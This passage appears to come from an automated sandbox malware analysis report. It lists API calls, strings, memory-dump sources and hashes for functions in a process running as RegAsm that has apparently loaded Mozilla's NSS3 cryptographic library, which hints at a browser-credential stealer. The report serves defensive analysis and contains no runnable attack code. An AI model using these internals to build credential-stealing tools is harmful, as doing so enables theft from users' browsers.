                                                                                                                                                                                                                                                                  • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C925F89
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C925FA0
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C925FB6
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C925FBF
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C92600C
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C926079
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C926084
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C926094
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Util$Item_Zfree$AlgorithmErrorPolicyPublicfreememcpy$Alloc_CopyDestroyHashSignatureType
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2310191401-3916222277
                                                                                                                                                                                                                                                                  • Opcode ID: d306a5882abbc13f3b1786d002266d4979e0065586a68341fdb10ce8f6e4393f
                                                                                                                                                                                                                                                                  • Instruction ID: 53d6cb7ae027171c6b400fa037b5a774d4734e79c8e2a540263cd9adbc6bd01b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d306a5882abbc13f3b1786d002266d4979e0065586a68341fdb10ce8f6e4393f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 658108B1E102059BDF10CE65CC84BAE77B9AF14318F144128E999E7B99E739EC18CBD1
                                                                                                                                                                                                                                                                  Function 6C949C40 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 118COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3(C_LoginUser), ref: 6C949C66
                                                                                                                                                                                                                                                                  • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C949C94
                                                                                                                                                                                                                                                                  • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C949CA3
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA2D930: PL_strncpyz.NSS3(?,?,?), ref: 6CA2D963
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3(?,00000000), ref: 6C949CB9
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3( userType = 0x%x,?), ref: 6C949CDA
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C949CF5
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C949D10
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3( pUsername = 0x%p,?), ref: 6C949D29
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3( ulUsernameLen = %d,?), ref: 6C949D42
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                                                                  • String ID: hSession = 0x%x$ pPin = 0x%p$ pUsername = 0x%p$ ulPinLen = %d$ ulUsernameLen = %d$ userType = 0x%x$ (CK_INVALID_HANDLE)$C_LoginUser
                                                                                                                                                                                                                                                                  • API String ID: 1003633598-3838449515
                                                                                                                                                                                                                                                                  • Opcode ID: d0b6879723580d56b8258073d51b1a8fe95cc8414896cfd3bd539fcd3f9bcd4c
                                                                                                                                                                                                                                                                  • Instruction ID: 510d91dc2f16f37fd91adc153c204a3beb0b7f41760d5cf26cc925b9e6feca74
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0b6879723580d56b8258073d51b1a8fe95cc8414896cfd3bd539fcd3f9bcd4c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1041E435601225EFDB059F50DE48F8A7BBABB5231AF09C024F509A7612DB30C859DBB1
                                                                                                                                                                                                                                                                  Function 00411CBE Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00411CC3
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,block,00000000,?,?,00416DD2), ref: 00411CE5
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00411CF0
                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 00411D07
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ExitH_prologProcessstrtok_s
                                                                                                                                                                                                                                                                  • String ID: block
                                                                                                                                                                                                                                                                  • API String ID: 3745986650-2199623458
                                                                                                                                                                                                                                                                  • Opcode ID: d6b2c451d332d4ae0119185cb43c277a52fbbd99c5396723a1e4532079f048b1
                                                                                                                                                                                                                                                                  • Instruction ID: 077d98e666cf939e0d52ed1e48e54f2a19c7b946024ddd983e2605e00cb7666d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d6b2c451d332d4ae0119185cb43c277a52fbbd99c5396723a1e4532079f048b1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C410975A50304ABDB109FB1ED04EDB37ACBB16345760062BBA07E3560E77C95C18B18
                                                                                                                                                                                                                                                                  Function 6CA29C60 Relevance: 27.2, APIs: 18, Instructions: 202threadCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • calloc.MOZGLUE(00000001,00000080), ref: 6CA29C70
                                                                                                                                                                                                                                                                  • PR_NewLock.NSS3 ref: 6CA29C85
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D98D0: calloc.MOZGLUE(00000001,00000084,6C900936,00000001,?,6C90102C), ref: 6C9D98E5
                                                                                                                                                                                                                                                                  • PR_NewCondVar.NSS3(00000000), ref: 6CA29C96
                                                                                                                                                                                                                                                                    • Part of subcall function 6C8FBB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C9021BC), ref: 6C8FBB8C
                                                                                                                                                                                                                                                                  • PR_NewLock.NSS3 ref: 6CA29CA9
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D98D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C9D9946
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D98D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C8916B7,00000000), ref: 6C9D994E
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D98D0: free.MOZGLUE(00000000), ref: 6C9D995E
                                                                                                                                                                                                                                                                  • PR_NewLock.NSS3 ref: 6CA29CB9
                                                                                                                                                                                                                                                                  • PR_NewLock.NSS3 ref: 6CA29CC9
                                                                                                                                                                                                                                                                  • PR_NewCondVar.NSS3(00000000), ref: 6CA29CDA
                                                                                                                                                                                                                                                                    • Part of subcall function 6C8FBB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C8FBBEB
                                                                                                                                                                                                                                                                    • Part of subcall function 6C8FBB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C8FBBFB
                                                                                                                                                                                                                                                                    • Part of subcall function 6C8FBB80: GetLastError.KERNEL32 ref: 6C8FBC03
                                                                                                                                                                                                                                                                    • Part of subcall function 6C8FBB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C8FBC19
                                                                                                                                                                                                                                                                    • Part of subcall function 6C8FBB80: free.MOZGLUE(00000000), ref: 6C8FBC22
                                                                                                                                                                                                                                                                  • PR_NewCondVar.NSS3(?), ref: 6CA29CF0
                                                                                                                                                                                                                                                                  • PR_NewPollableEvent.NSS3 ref: 6CA29D03
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA1F3B0: PR_CallOnce.NSS3(6CA714B0,6CA1F510), ref: 6CA1F3E6
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA1F3B0: PR_CreateIOLayerStub.NSS3(6CA7006C), ref: 6CA1F402
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA1F3B0: PR_Malloc.NSS3(00000004), ref: 6CA1F416
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA1F3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6CA1F42D
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA1F3B0: PR_SetSocketOption.NSS3(?), ref: 6CA1F455
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA1F3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6CA1F473
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9890: TlsGetValue.KERNEL32(?,?,?,6C9D97EB), ref: 6C9D989E
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6CA29D78
                                                                                                                                                                                                                                                                  • calloc.MOZGLUE(00000001,0000000C), ref: 6CA29DAF
                                                                                                                                                                                                                                                                  • _PR_CreateThread.NSS3(00000000,6CA29EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6CA29D9F
                                                                                                                                                                                                                                                                    • Part of subcall function 6C8FB3C0: TlsGetValue.KERNEL32 ref: 6C8FB403
                                                                                                                                                                                                                                                                    • Part of subcall function 6C8FB3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6C8FB459
                                                                                                                                                                                                                                                                  • _PR_CreateThread.NSS3(00000000,6CA2A060,00000000,00000001,00000001,00000000,?,00000000), ref: 6CA29DE8
                                                                                                                                                                                                                                                                  • calloc.MOZGLUE(00000001,0000000C), ref: 6CA29DFC
                                                                                                                                                                                                                                                                  • _PR_CreateThread.NSS3(00000000,6CA2A530,00000000,00000001,00000001,00000000,?,00000000), ref: 6CA29E29
                                                                                                                                                                                                                                                                  • calloc.MOZGLUE(00000001,0000000C), ref: 6CA29E3D
                                                                                                                                                                                                                                                                  • _PR_MD_UNLOCK.NSS3(?), ref: 6CA29E71
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE890,00000000), ref: 6CA29E89
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4254102231-0
                                                                                                                                                                                                                                                                  • Opcode ID: 1b628bb242909cc05083237ab1f21d9ea0911a45ae183aade2e9ed9004abdf68
                                                                                                                                                                                                                                                                  • Instruction ID: 8fc98e27ac0a12b4c29d8a59e1577c979bf3df0fb05394a5ab2bb0f77a2dab29
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b628bb242909cc05083237ab1f21d9ea0911a45ae183aade2e9ed9004abdf68
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BF615DB1900706AFD714DF75C944AA7BBF8FF08608B098539E819C7B10EB34E855CBA1
                                                                                                                                                                                                                                                                  Function 6C944CD0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 120COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3(C_GetObjectSize), ref: 6C944CF3
                                                                                                                                                                                                                                                                  • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C944D28
                                                                                                                                                                                                                                                                  • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C944D37
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA2D930: PL_strncpyz.NSS3(?,?,?), ref: 6CA2D963
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3(?,00000000), ref: 6C944D4D
                                                                                                                                                                                                                                                                  • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C944D7B
                                                                                                                                                                                                                                                                  • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C944D8A
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3(?,00000000), ref: 6C944DA0
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6C944DBC
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6C944E20
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                                                                  • String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize
                                                                                                                                                                                                                                                                  • API String ID: 1003633598-3553622718
                                                                                                                                                                                                                                                                  • Opcode ID: 33d1d282a6a95845c735852a862225ba4dfde9a6ca9d97a00f40c22731632ed2
                                                                                                                                                                                                                                                                  • Instruction ID: d0935fd9075bc273e48586b1dc639568d4fa85f0686aea87d9e9a818686a3aa3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 33d1d282a6a95845c735852a862225ba4dfde9a6ca9d97a00f40c22731632ed2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8141D375600225EFD7059F50DD88FAA77B9BB5231DF08C125E409ABA12DB34D889CBB1
                                                                                                                                                                                                                                                                  Function 6C947C90 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 110COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3(C_Verify), ref: 6C947CB6
                                                                                                                                                                                                                                                                  • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C947CE4
                                                                                                                                                                                                                                                                  • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C947CF3
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA2D930: PL_strncpyz.NSS3(?,?,?), ref: 6CA2D963
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3(?,00000000), ref: 6C947D09
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C947D2A
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C947D45
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6C947D5E
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3( ulSignatureLen = %d,?), ref: 6C947D77
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                                                                  • String ID: hSession = 0x%x$ pData = 0x%p$ pSignature = 0x%p$ ulDataLen = %d$ ulSignatureLen = %d$ (CK_INVALID_HANDLE)$C_Verify
                                                                                                                                                                                                                                                                  • API String ID: 1003633598-3278097884
                                                                                                                                                                                                                                                                  • Opcode ID: baf78553c84d200ee93a02c79b3e8a1144e35b3c433fae9a01165d70dfb585b1
                                                                                                                                                                                                                                                                  • Instruction ID: 31ffc6c4d6937839d9ab599264b770f34aaafa5e8f7e627d5ba1a7c8537955e9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: baf78553c84d200ee93a02c79b3e8a1144e35b3c433fae9a01165d70dfb585b1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8531E539601269EFDB059F54DD48F9A7BB2BB52318F08C024E40997612DB30D89ACBB1
                                                                                                                                                                                                                                                                  Function 6CA21C60 Relevance: 25.6, APIs: 17, Instructions: 114COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6CA213BC,?,?,?,6CA21193), ref: 6CA21C6B
                                                                                                                                                                                                                                                                  • PR_NewLock.NSS3(?,6CA21193), ref: 6CA21C7E
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D98D0: calloc.MOZGLUE(00000001,00000084,6C900936,00000001,?,6C90102C), ref: 6C9D98E5
                                                                                                                                                                                                                                                                  • PR_NewCondVar.NSS3(00000000,?,6CA21193), ref: 6CA21C91
                                                                                                                                                                                                                                                                    • Part of subcall function 6C8FBB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C9021BC), ref: 6C8FBB8C
                                                                                                                                                                                                                                                                  • PR_NewCondVar.NSS3(00000000,?,?,6CA21193), ref: 6CA21CA7
                                                                                                                                                                                                                                                                    • Part of subcall function 6C8FBB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C8FBBEB
                                                                                                                                                                                                                                                                    • Part of subcall function 6C8FBB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C8FBBFB
                                                                                                                                                                                                                                                                    • Part of subcall function 6C8FBB80: GetLastError.KERNEL32 ref: 6C8FBC03
                                                                                                                                                                                                                                                                    • Part of subcall function 6C8FBB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C8FBC19
                                                                                                                                                                                                                                                                    • Part of subcall function 6C8FBB80: free.MOZGLUE(00000000), ref: 6C8FBC22
                                                                                                                                                                                                                                                                  • PR_NewCondVar.NSS3(00000000,?,?,?,6CA21193), ref: 6CA21CBE
                                                                                                                                                                                                                                                                  • PR_NewCondVar.NSS3(00000000,?,?,?,?,6CA21193), ref: 6CA21CD4
                                                                                                                                                                                                                                                                  • calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6CA21193), ref: 6CA21CFE
                                                                                                                                                                                                                                                                  • PR_Lock.NSS3(?,?,?,?,?,?,?,6CA21193), ref: 6CA21D1A
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C901A48), ref: 6C9D9BB3
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C901A48), ref: 6C9D9BC8
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6CA21193), ref: 6CA21D3D
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BDD70: TlsGetValue.KERNEL32 ref: 6C9BDD8C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C9BDDB4
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE890,00000000,?,6CA21193), ref: 6CA21D4E
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6CA21193), ref: 6CA21D64
                                                                                                                                                                                                                                                                  • PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6CA21193), ref: 6CA21D6F
                                                                                                                                                                                                                                                                  • PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6CA21193), ref: 6CA21D7B
                                                                                                                                                                                                                                                                  • PR_DestroyCondVar.NSS3(?,?,?,?,?,6CA21193), ref: 6CA21D87
                                                                                                                                                                                                                                                                  • PR_DestroyCondVar.NSS3(00000000,?,?,?,6CA21193), ref: 6CA21D93
                                                                                                                                                                                                                                                                  • PR_DestroyLock.NSS3(00000000,?,?,6CA21193), ref: 6CA21D9F
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000,?,6CA21193), ref: 6CA21DA8
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3246495057-0
                                                                                                                                                                                                                                                                  • Opcode ID: 91a37a25ad94dc4f833cdff8c1301389945c7edd707a2742e019ebfaa74ae2a5
                                                                                                                                                                                                                                                                  • Instruction ID: 17b50f59188cbe0ee2cfc9fd7f6ffeae585ab5a61d8d618d3d0eedcb9445e944
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 91a37a25ad94dc4f833cdff8c1301389945c7edd707a2742e019ebfaa74ae2a5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34310CF5E00711ABEB219F359C41A7776F4AF2164CF084838E94A97B41F736E905CBA2
                                                                                                                                                                                                                                                                  Function 6C975CA0 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
